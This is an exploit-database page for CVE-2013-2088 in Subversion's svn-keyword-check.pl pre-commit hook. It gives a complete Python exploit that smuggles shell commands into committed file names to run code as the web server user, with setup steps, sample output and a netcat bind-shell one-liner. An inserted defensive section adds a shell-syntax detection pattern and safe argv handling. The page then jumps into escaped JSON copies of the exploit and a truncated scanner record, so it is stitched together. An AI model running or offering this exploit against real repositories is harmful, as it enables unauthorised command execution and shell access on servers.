ID: EDB-ID:40507 | Type: exploitdb | Reporter: GlacierZ0ne | Modified: 2016-10-12T00:00:00
Description
Subversion 1.6.6 / 1.6.12 - Code Execution. CVE-2013-2088. Remote exploit for Linux platform
# This is an exploit for the subversion vulnerability published as CVE-2013-2088.
# Author: GlacierZ0ne (kai@ktechnologies.de)
# Exploit Type: Code Execution
# Access Type: Authenticated Remote Exploit
# Prerequisites: svn command line client available,
# subversion server exposes webdav through apache,
# user/password with commit privilege
# The exploit has been tested with the following software:
# * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit
# * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit
# * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit
# The following conditions need to be met in order for this to work:
# The pre-commit script svn-keyword-check.pl needs to be configured as
# pre-commit hook. The version shipped with the subversion 1.6.6 contains
# a bug which prevents it from being used at all. This bug must be fixed
# (otherwise neither the exploit nor the intended purpose of the script
# will work).
# This perl script can be downloaded from the archive source distribution
# at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23
# are vulnerable.
# ###############################################################
# 1. configure the pre-commit hook to use svn-keyword-check.pl
# ###############################################################
# Copy the svn-keyword-check.pl from the source distribution to the
# /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl
# to pre-commit. Make sure both files are owned by the user running
# apache (e.g. www-data) and have the executable flag set:
#
# notroot@ubuntu:/$ cd /svn/repositories/testrepo/hooks
# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit
# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit
# notroot@ubuntu:/svn/repos/testrepo/hooks$ ls -al
# total 76
# drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 .
# drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 ..
# -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl
# -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl
# -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl
# -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl
# -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit
# -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl
# -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl
# -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl
# -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl
# -rw-r--r-- 1 www-data www-data 2830 2016-09-05 15:23 start-commit.tmpl
# -rwxr-xr-x 1 www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl
# notroot@ubuntu:/svn/repos/testrepo/hooks$
# According to the subversion documentation, svn-keyword-check.pl needs
# to be called by pre-commit. svn-keyword-check.pl will return 1 if it
# detects something that should prevent the commit. In that case, the
# subversion server will cancel the commit. Here's how pre-commit looked
# on my test server:
# notroot@ubuntu:/svn/repos/testrepo/hooks$ cat pre-commit
# #!/bin/sh
# REPOS="$1"
# TXN="$2"
# # Make sure that the log message contains some text.
# #jSVNLOOK=/usr/bin/svnlook
# $SVNLOOK log -t "$TXN" "$REPOS" | \
# ep "[a-zA-Z0-9]" > /dev/null || exit 1
#
# # Exit on all errors.
# set -e
#
# # Check the files that are are listed in "svnlook changed" (except deleted
# # files) for possible problems with svn:keywords set on binary files.
# "$REPOS"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN
# #
# #
# #
#
# # All checks passed, so allow the commit.
# exit 0
#
# ###############################################################
#
# 2. fix the bug in svn-keyword-check.pl
#
# ###############################################################
# The script pre-commit passes the repository and the transaction on to
# the script svn-keyword-check.pl. Alternatively, the script also accepts
# repository and revision. However, specifying both transaction
# and revision is illegal; only one of them may be given.
# This is reflected in the input parameter plausibility check
# performed in line 89:
#
# if (defined($transaction) and !defined($revision)) {
# croak "Can't define both revision and transaction!\n";
# }
#
# Unfortunately, there is one exclamation mark too many. It must
# be
#
# if (defined($transaction) and defined($revision)) {
# croak "Can't define both revision and transaction!\n";
# }
#
# As the script is shipped in the 1.6.6 source distribution,
# no commit is possible at all.
#
# Before using the exploit you should first commit one file
# manually so that the svn client can store your user/password
# locally.
#
# Then, open a shell and navigate to the directory of your project
# and start python cve-2013-2088-1.py <command>:
#
# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig
# [+] Randfilename is mJHeSkya
# [+] Created random file
# [+] Submitted random file to version control
# [+] Created fake file for cmd execution
# [+] Exploit seems to work:
#
# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a
# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0
# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link
# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0
# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:1000
# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB)
#
# lo Link encap:Local Loopback
# inet addr:127.0.0.1 Mask:255.0.0.0
# inet6 addr: ::1/128 Scope:Host
# UP LOOPBACK RUNNING MTU:16436 Metric:1
# RX packets:0 errors:0 dropped:0 overruns:0 frame:0
# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:0
# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
#
# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py id
# [+] Randfilename is WmolHiuv
# [+] Created random file
# [+] Submitted random file to version control
# [+] Created fake file for cmd execution
# [+] Exploit seems to work:
#
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
#
# Important things to notice
# * For each command execution the exploit will put a file under
# version control. If you submit a lot of commands you will
# create a lot of files with random 8 alphanumeric character
# file names in your repository.
# * Your command must not contain a / since file names must not
# contain a /. In the author's test environment the current
# working directory of apache was the root folder /.
# Therefore, the exploit will replace / in the command with
# $(pwd). This worked fine for the author.
# In your environment this might be different. As a first step,
# execute $(pwd) in order to check if this works for you, too.
# * The command execution assumes that your command prints something
# to the terminal and exits. If you know your command will not
# immediately terminate (e.g. because you're starting a reverse/
# bind shell), provide the -d or --dont-terminate flag:
# python svn_exploit2.py -d "/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe"
#
#
#
import sys
import subprocess
import argparse
import random
import os
if __name__ == "__main__":
    lowerupper = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    slash_replacement = "$(pwd)"
    cwd = os.getcwd()
    parser = argparse.ArgumentParser (usage="python {} [options] command".format (sys.argv [0]),
                                      epilog="\x0a\x0a")
    parser.add_argument (dest="command", help="Command to execute")
    parser.add_argument ("-d", "--dont-terminate", help="don't force output be sent back to the client. Useful for reverse shell connections.",
                         action="store_true")
    #
    # args handling
    #
    if (len(sys.argv) <= 1):
        parser.print_help ()
        sys.exit (0)
    args = parser.parse_args ()
    if not args.command:
        parser.print_help ()
        sys.exit (0)
    #
    # / cannot be used in the command because svn will interpret it as
    # file separator. Therefore you have to use a workaround. Here,
    # $(pwd) works great for us.
    #
    command = args.command
    if command.find ("/") != -1:
        command = command.replace("/", slash_replacement)
    #
    # prepare output files for stdout, stderr
    #
    sout = open ("stdout", "w+")
    serr = open ("stderr", "w+")
    randfilename = ""
    for idx in range (0, 8):
        randfilename = randfilename + lowerupper [random.randint (0,51)]
    print ("[+] Randfilename is {}".format(randfilename))
    f = open (randfilename, "w+")
    f.write ("You've been pwned by GlacierZ0ne'") # write 4
    f.flush ()
    f.close ()
    p = subprocess.Popen (["svn", "add", "./{randfilename}".format (randfilename=randfilename)],
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    c = p.communicate ()
    sout.write (c[0])
    if len(c[1]) > 0:
        print ("[-] Create random file failed:")
        print (c[1])
        sys.exit (0)
    print ("[+] Created random file")
    p = subprocess.Popen (["svn", "commit", "-m", "I pwned you", "./{randfilename}".format (randfilename=randfilename)],
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    c = p.communicate ()
    sout.write (c[0])
    if len(c[1]) > 0:
        print ("[-] Submission of random file failed:")
        print (c[1])
        sys.exit (0)
    print ("[+] Submitted random file to version control")
    fakefilename = None
    if args.dont_terminate == True:
        fakefilename = "{}; {}".format (randfilename, command)
    else:
        fakefilename = "{}; {} 1>&2; exit 1".format (randfilename, command)
    f = open (fakefilename, "w+")
    f.write ("You've been pwned by GlacierZ0ne") # write 4
    f.flush ()
    f.close ()
    p = subprocess.Popen (["svn", "add", "{fakefilename}"
                           .format (cwd=cwd, fakefilename=fakefilename)],
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    c = p.communicate ()
    sout.write (c[0])
    if len(c[1]) > 0:
        print ("[-] Creation of fake file failed:")
        print (c[1])
        sys.exit (0)
    print ("[+] Created fake file for cmd execution")
    p = subprocess.Popen (["svn", "commit", "-m", "I pwned you", "{fakefilename}"
                           .format (cwd=cwd, fakefilename=fakefilename)],
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    c = p.communicate ()
    sout.write (c[0])
    if len(c[1]) == 0:
        if not args.dont_terminate:
            print "[-] Something went wrong, pre-commit hook didn't kick in."
        else:
            print "[!] Done"
        sys.exit (0)
    else:
        idx0= c[1].find ("Commit blocked by pre-commit hook")
        idx = c[1].find ("failed with this output")
        if idx0 != -1 and idx != -1:
            print ("[+] Exploit seems to work: ")
            print (c[1][idx + len("failed with this output") + 1:])
    sout.flush ()
    sout.close ()
    serr.flush ()
    serr.close ()
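
The defender's side of the same mechanism, as an added example that is not part of the original exploit or of the Subversion project: a hook or audit job can flag changed paths that carry shell control syntax, and any helper that hands a changed path to `svnlook` can pass it as a single argv element instead of building a shell string. The function names, the deny-list pattern and the sample `svnlook changed` output are assumptions constructed for illustration.

```python
import re
import shlex

# Shell syntax that ends a command or starts a substitution. Assumption: this
# short deny-list is an audit tripwire; the fix is to keep the shell out of it.
SHELL_META = re.compile(r"[;&|`<>]|\$[({]")

# Constructed sample of `svnlook changed -t TXN REPOS` output (not captured from
# a real server): status flags in the first columns, path from column 4 on.
SAMPLE_CHANGED = "\n".join([
    "A   trunk/docs/readme.txt",
    "U   trunk/src/main.c",
    "A   trunk/AbCdEfGh; echo marker 1>&2; exit 1",
    "A   trunk/notes $(pwd)tmp.txt",
    "D   trunk/old; name",
    "_U  trunk/logo.png",
])


def parse_changed(output):
    """Split `svnlook changed` output into (status, path) pairs.

    The path is taken verbatim from column 4, spaces and punctuation included,
    so nothing in it is interpreted while parsing.
    """
    entries = []
    for line in output.splitlines():
        if len(line) < 5:
            continue  # too short to hold status columns plus a path
        entries.append((line[:4].strip(), line[4:]))
    return entries


def suspicious_paths(output):
    """Return added or modified paths that contain shell control syntax.

    Deleted entries are skipped, matching the hook's own scope
    ("except deleted files").
    """
    return [path for status, path in parse_changed(output)
            if not status.startswith("D") and SHELL_META.search(path)]


def propget_argv(repos, txn, path):
    """Argument vector for reading svn:keywords of one path in a transaction.

    Given to subprocess.run() as a list (no shell=True), the path stays one
    argument whatever characters it contains.
    """
    return ["svnlook", "propget", "-t", txn, repos, "svn:keywords", path]


def propget_shell_string(repos, txn, path):
    """The same call as a single string for /bin/sh, every value quoted.

    Only for places where a shell string cannot be avoided.
    """
    return " ".join(shlex.quote(arg) for arg in propget_argv(repos, txn, path))


if __name__ == "__main__":
    for flagged in suspicious_paths(SAMPLE_CHANGED):
        print("reject commit, path contains shell syntax: %r" % flagged)
        # Repository path and transaction name below are placeholders.
        print("  safe argv:", propget_argv("/svn/repos/testrepo", "12-a", flagged))
```

The page states that scripts before 1.6.23 are vulnerable, so replacing the contrib script with a later version remains the primary fix; the check above helps when reviewing existing repositories for paths of this shape.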
\n# \n# Then, open a shell and navigate to the directory of your project \n# and start python cve-2013-2088-1.py <command>: \n# \n# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig \n# [+] Randfilename is mJHeSkya \n# [+] Created random file \n# [+] Submitted random file to version control \n# [+] Created fake file for cmd execution \n# [+] Exploit seems to work: \n# \n# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a \n# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0 \n# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link \n# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 \n# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0 \n# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0 \n# collisions:0 txqueuelen:1000 \n# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB) \n# \n# lo Link encap:Local Loopback \n# inet addr:127.0.0.1 Mask:255.0.0.0 \n# inet6 addr: ::1/128 Scope:Host \n# UP LOOPBACK RUNNING MTU:16436 Metric:1 \n# RX packets:0 errors:0 dropped:0 overruns:0 frame:0 \n# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 \n# collisions:0 txqueuelen:0 \n# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) \n# \n# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py id \n# [+] Randfilename is WmolHiuv \n# [+] Created random file \n# [+] Submitted random file to version control \n# [+] Created fake file for cmd execution \n# [+] Exploit seems to work: \n# \n# uid=33(www-data) gid=33(www-data) groups=33(www-data) \n# \n# \n# Important things to notice \n \n# * For each command execution the exploit will put a file under \n# version control. If you submit a lot of commands you will \n# create a lot of files with random 8 alphanumeric character \n# file names in your repository. \n# * Your command must not contain a / since file names must not \n# contain a /. In the author's test environment the current \n# working directory of apache was the root folder /. 
\n# Therefore, the exploit will replace / in the command with \n# $(pwd). This worked fine for the author. \n# In your environment this might be different. As first thing \n# execute $(pwd) in order to check if this works for you, too. \n# * The command execution assumes that your command prints something \n# to the terminal and exits. If you know your command will not \n# immediately terminate (e.g. because you're starting a reverse/ \n# bind shell), provide the -d or --dont-terminate flag: \n# python svn_exploit2.py -d \"/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe\" \n# \n# \n# \nimport sys \nimport subprocess \nimport argparse \nimport random \nimport os \n \nif __name__ == \"__main__\": \n \nlowerupper = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\" \nslash_replacement = \"$(pwd)\" \ncwd = os.getcwd() \n \nparser = argparse.ArgumentParser (usage=\"python {} [options] command\".format (sys.argv [0]), \nepilog=\"\\x0a\\x0a\") \n \nparser.add_argument (dest=\"command\", help=\"Command to execute\") \nparser.add_argument (\"-d\", \"--dont-terminate\", help=\"don't force output be sent back to the client. Useful for reverse shell connections.\", \naction=\"store_true\") \n \n# \n# args handling \n# \nif (len(sys.argv) <= 1): \nparser.print_help () \nsys.exit (0) \n \nargs = parser.parse_args () \nif not args.command: \nparser.print_help () \nsys.exit (0) \n \n# \n# / cannot be used in the command because svn will interprete it as \n# file separator. Therefore you have to use a workaround. Here, \n# $(pwd) works great for us. 
\n# \ncommand = args.command \nif command.find (\"/\") != -1: \ncommand = command.replace(\"/\", slash_replacement) \n \n# \n# prepare output files for stdout, stderr \n# \nsout = open (\"stdout\", \"w+\") \nserr = open (\"stderr\", \"w+\") \n \nrandfilename = \"\" \nfor idx in range (0, 8): \nrandfilename = randfilename + lowerupper [random.randint (0,51)] \n \nprint (\"[+] Randfilename is {}\".format(randfilename)) \n \nf = open (randfilename, \"w+\") \nf.write (\"You've been pwned by GlacierZ0ne'\") # write 4 \nf.flush () \nf.close () \n \np = subprocess.Popen ([\"svn\", \"add\", \"./{randfilename}\".format (randfilename=randfilename)], \nstdout=subprocess.PIPE, stderr=subprocess.PIPE) \nc = p.communicate () \nsout.write (c[0]) \nif len(c[1]) > 0: \nprint (\"[-] Create random file failed:\") \nprint (c[1]) \nsys.exit (0) \nprint (\"[+] Created random file\") \n \np = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"./{randfilename}\".format (randfilename=randfilename)], \nstdout=subprocess.PIPE, stderr=subprocess.PIPE) \nc = p.communicate () \nsout.write (c[0]) \nif len(c[1]) > 0: \nprint (\"[-] Submission of random file failed:\") \nprint (c[1]) \nsys.exit (0) \nprint (\"[+] Submitted random file to version control\") \n \nfakefilename = None \nif args.dont_terminate == True: \nfakefilename = \"{}; {}\".format (randfilename, command) \nelse: \nfakefilename = \"{}; {} 1>&2; exit 1\".format (randfilename, command) \nf = open (fakefilename, \"w+\") \nf.write (\"You've been pwned by GlacierZ0ne\") # write 4 \nf.flush () \nf.close () \n \np = subprocess.Popen ([\"svn\", \"add\", \"{fakefilename}\" \n.format (cwd=cwd, fakefilename=fakefilename)], \nstdout=subprocess.PIPE, stderr=subprocess.PIPE) \nc = p.communicate () \nsout.write (c[0]) \nif len(c[1]) > 0: \nprint (\"[-] Creation of fake file failed:\") \nprint (c[1]) \nsys.exit (0) \nprint (\"[+] Created fake file for cmd execution\") \n \np = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I 
pwned you\", \"{fakefilename}\" \n.format (cwd=cwd, fakefilename=fakefilename)], \nstdout=subprocess.PIPE, stderr=subprocess.PIPE) \nc = p.communicate () \nsout.write (c[0]) \nif len(c[1]) == 0: \nif not args.dont_terminate: \nprint \"[-] Something went wrong, pre-commit hook didn't kick in.\" \nelse: \nprint \"[!] Done\" \nsys.exit (0) \nelse: \nidx0= c[1].find (\"Commit blocked by pre-commit hook\") \nidx = c[1].find (\"failed with this output\") \n \nif idx0 != -1 and idx != -1: \nprint (\"[+] Exploit seems to work: \") \nprint (c[1][idx + len(\"failed with this output\") + 1:]) \n \nsout.flush () \nsout.close () \nserr.flush () \nserr.close () \n \n \n`\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139131/subversion-exec.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSubversion 1.6.61.6.12 - Code Execution", "edition": 1, "published": "2016-10-12T00:00:00", "title": "Subversion 1.6.61.6.12 - Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2088"], "modified": "2016-10-12T00:00:00", "id": "EXPLOITPACK:788FB751D9E44436830A9D1B67E28792", "href": "", "sourceData": "# This is an exploit for the subversion vulnerability published as CVE-2013-2088.\n\n# Author: GlacierZ0ne (kai@ktechnologies.de)\n# Exploit Type: Code Execution\n# Access Type: Authenticated Remote Exploit\n# Prerequisites: svn command line client available,\n# subversion server exposes webdav through apache,\n# user/password with commit privilege\n\n# The exploit has been tested with the following software:\n\n# * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit\n# * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit\n# * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit\n\n# The following conditions need to be met in order for this to work:\n\n# The pre-commit script 
svn-keyword-check.pl needs to be configured as\n# pre-commit hook. The version shipped with the subversion 1.6.6 contains\n# a bug which prevents it from being used at all. This bug must be fixed\n# (otherwise neither the exploit, nor the intented purpose of the script\n# will work)\n# This perl script can be downloaded from the archive source distribution\n# at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23\n# are vulnerable.\n\n# ###############################################################\n\n# 1. configure the pre-commit hook to use svn-keyword-check.pl\n\n# ###############################################################\n# Copy the svn-keyword-check.pl from the source distribution to the\n# /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl\n# to pre-commit. Make sure both files are owned by the user running\n# apache (e.g. www-data) and have the executable flag set:\n#\n# notroot@ubuntu:/$ cd /svn/repositories/testrepo/hooks\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ ls -al\n# total 76\n# drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 .\n# drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 ..\n# -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl\n# -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl\n# -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl\n# -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl\n# -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit\n# -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl\n# -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl\n# -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl\n# -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl\n# -rw-r--r-- 1 www-data 
www-data 2830 2016-09-05 15:23 start-commit.tmpl\n# -rwxr-xr-x 1 www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ \n\n# According to the subversion documentation, svn-keyword-check.pl needs\n# to be called by pre-commit. svn-keyword-check.pl will return 1 if it\n# detects something that should prevent the commit. In that case, the\n# subversion server will cancel the commit. Here's how pre-commit looked\n# on my test server:\n\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ cat pre-commit\n# #!/bin/sh\n\n# REPOS=\"$1\"\n# TXN=\"$2\"\n\n# # Make sure that the log message contains some text.\n# #jSVNLOOK=/usr/bin/svnlook\n# $SVNLOOK log -t \"$TXN\" \"$REPOS\" | \\\n# ep \"[a-zA-Z0-9]\" > /dev/null || exit 1\n# \n# # Exit on all errors.\n# set -e\n# \n# # Check the files that are are listed in \"svnlook changed\" (except deleted\n# # files) for possible problems with svn:keywords set on binary files.\n# \"$REPOS\"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN\n# #\n# #\n# #\n# \n# # All checks passed, so allow the commit.\n# exit 0\n# \n# ###############################################################\n# \n# 2. fix the bug in svn-keyword-check.pl\n# \n# ###############################################################\n# The script pre-commit will pass on repository and transaction to\n# the script svn-keyword-check.pl. Alternatively, it also accepts\n# repository and revision. However, specifying both transaction\n# and revision is illegal, only one of them is considered legal.\n# This reflects in the input parameter plausibility check\n# performed in line 89:\n# \n# if (defined($transaction) and !defined($revision)) {\n# croak \"Can't define both revision and transaction!\\n\";\n# }\n# \n# Unfortunately, there is an exclamation mark too much. 
It must\n# be\n# \n# if (defined($transaction) and defined($revision)) {\n# croak \"Can't define both revision and transaction!\\n\";\n# }\n# \n# The way this script is shipped in the 1.6.6 source distribution\n# no commit is possible at all.\n# \n# Before using the exploit you should first commit one file\n# manually so that the svn client can store your user/password\n# locally.\n# \n# Then, open a shell and navigate to the directory of your project\n# and start python cve-2013-2088-1.py <command>:\n#\n# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig\n# [+] Randfilename is mJHeSkya\n# [+] Created random file\n# [+] Submitted random file to version control\n# [+] Created fake file for cmd execution\n# [+] Exploit seems to work: \n#\n# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a \n# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0\n# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link\n# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\n# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0\n# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0\n# collisions:0 txqueuelen:1000 \n# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB)\n#\n# lo Link encap:Local Loopback \n# inet addr:127.0.0.1 Mask:255.0.0.0\n# inet6 addr: ::1/128 Scope:Host\n# UP LOOPBACK RUNNING MTU:16436 Metric:1\n# RX packets:0 errors:0 dropped:0 overruns:0 frame:0\n# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\n# collisions:0 txqueuelen:0 \n# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\n#\n# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py id\n# [+] Randfilename is WmolHiuv\n# [+] Created random file\n# [+] Submitted random file to version control\n# [+] Created fake file for cmd execution\n# [+] Exploit seems to work: \n#\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n#\n#\n# Important things to notice\n\n# * For each command execution the exploit will put a file under\n# version control. 
If you submit a lot of commands you will\n# create a lot of files with random 8 alphanumeric character\n# file names in your repository.\n# * Your command must not contain a / since file names must not\n# contain a /. In the author's test environment the current\n# working directory of apache was the root folder /.\n# Therefore, the exploit will replace / in the command with\n# $(pwd). This worked fine for the author.\n# In your environment this might be different. As first thing\n# execute $(pwd) in order to check if this works for you, too.\n# * The command execution assumes that your command prints something\n# to the terminal and exits. If you know your command will not\n# immediately terminate (e.g. because you're starting a reverse/\n# bind shell), provide the -d or --dont-terminate flag:\n# python svn_exploit2.py -d \"/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe\"\n#\n#\n#\nimport sys\nimport subprocess\nimport argparse\nimport random\nimport os\n\nif __name__ == \"__main__\":\n\n lowerupper = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n slash_replacement = \"$(pwd)\" \n cwd = os.getcwd()\n\n parser = argparse.ArgumentParser (usage=\"python {} [options] command\".format (sys.argv [0]),\n epilog=\"\\x0a\\x0a\")\n\n parser.add_argument (dest=\"command\", help=\"Command to execute\")\n parser.add_argument (\"-d\", \"--dont-terminate\", help=\"don't force output be sent back to the client. Useful for reverse shell connections.\",\n action=\"store_true\")\n\n #\n # args handling\n #\n if (len(sys.argv) <= 1):\n parser.print_help ()\n sys.exit (0)\n\n args = parser.parse_args ()\n if not args.command:\n parser.print_help ()\n sys.exit (0)\n\n #\n # / cannot be used in the command because svn will interprete it as\n # file separator. Therefore you have to use a workaround. 
Here,\n # $(pwd) works great for us.\n #\n command = args.command\n if command.find (\"/\") != -1:\n command = command.replace(\"/\", slash_replacement)\n \n #\n # prepare output files for stdout, stderr\n #\n sout = open (\"stdout\", \"w+\")\n serr = open (\"stderr\", \"w+\")\n\n randfilename = \"\"\n for idx in range (0, 8):\n randfilename = randfilename + lowerupper [random.randint (0,51)]\n\n print (\"[+] Randfilename is {}\".format(randfilename))\n\n f = open (randfilename, \"w+\")\n f.write (\"You've been pwned by GlacierZ0ne'\") # write 4\n f.flush ()\n f.close ()\n\n p = subprocess.Popen ([\"svn\", \"add\", \"./{randfilename}\".format (randfilename=randfilename)],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE) \n c = p.communicate ()\n sout.write (c[0])\n if len(c[1]) > 0:\n print (\"[-] Create random file failed:\")\n print (c[1])\n sys.exit (0)\n print (\"[+] Created random file\")\n \n p = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"./{randfilename}\".format (randfilename=randfilename)],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n c = p.communicate ()\n sout.write (c[0])\n if len(c[1]) > 0:\n print (\"[-] Submission of random file failed:\")\n print (c[1])\n sys.exit (0)\n print (\"[+] Submitted random file to version control\")\n\n fakefilename = None\n if args.dont_terminate == True:\n fakefilename = \"{}; {}\".format (randfilename, command)\n else:\n fakefilename = \"{}; {} 1>&2; exit 1\".format (randfilename, command)\n f = open (fakefilename, \"w+\")\n f.write (\"You've been pwned by GlacierZ0ne\") # write 4\n f.flush ()\n f.close ()\n\n p = subprocess.Popen ([\"svn\", \"add\", \"{fakefilename}\"\n .format (cwd=cwd, fakefilename=fakefilename)],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE) \n c = p.communicate ()\n sout.write (c[0])\n if len(c[1]) > 0:\n print (\"[-] Creation of fake file failed:\")\n print (c[1])\n sys.exit (0)\n print (\"[+] Created fake file for cmd execution\")\n \n p = subprocess.Popen 
([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"{fakefilename}\"\n .format (cwd=cwd, fakefilename=fakefilename)],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n c = p.communicate ()\n sout.write (c[0])\n if len(c[1]) == 0:\n if not args.dont_terminate:\n print \"[-] Something went wrong, pre-commit hook didn't kick in.\"\n else:\n print \"[!] Done\"\n sys.exit (0)\n else:\n idx0= c[1].find (\"Commit blocked by pre-commit hook\")\n idx = c[1].find (\"failed with this output\")\n \n if idx0 != -1 and idx != -1:\n print (\"[+] Exploit seems to work: \")\n print (c[1][idx + len(\"failed with this output\") + 1:])\n \n sout.flush ()\n sout.close ()\n serr.flush ()\n serr.close ()", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T10:45:13", "description": "Subversion team reports :\n\nThe script contrib/hook-scripts/check-mime-type.pl does not escape\nargv arguments to 'svnlook' that start with a hyphen. This could be\nused to cause 'svnlook', and hence check-mime-type.pl, to error out.\n\nThe script contrib/hook-scripts/svn-keyword-check.pl parses filenames\nfrom the output of 'svnlook changed' and passes them to a further\nshell command (equivalent to the 'system()' call of the C standard\nlibrary) without escaping them. 
